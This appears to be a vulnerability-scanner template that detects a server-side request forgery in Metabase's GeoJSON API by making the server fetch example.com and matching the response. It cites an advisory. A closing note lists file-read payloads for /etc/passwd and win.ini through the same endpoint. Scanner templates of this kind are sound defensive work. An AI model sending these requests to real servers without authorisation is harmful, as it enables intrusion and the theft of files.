id: metabase-geojson-ssrf
info:
  name: Metabase GeoJSON API SSRF
  risk: High

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '3000'
  prefixes: 'metabase'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/api/geojson?url=http://example.com
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", '<title>Example Domain</title>') && StringSearch("resHeaders", 'metabase.DEVICE')

references:
  - link: https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
  - note: |
      You can also do LFI with these endpoint
      /api/geojson?url=file:c://windows/win.ini
      /api/geojson?url=file:/etc/passwd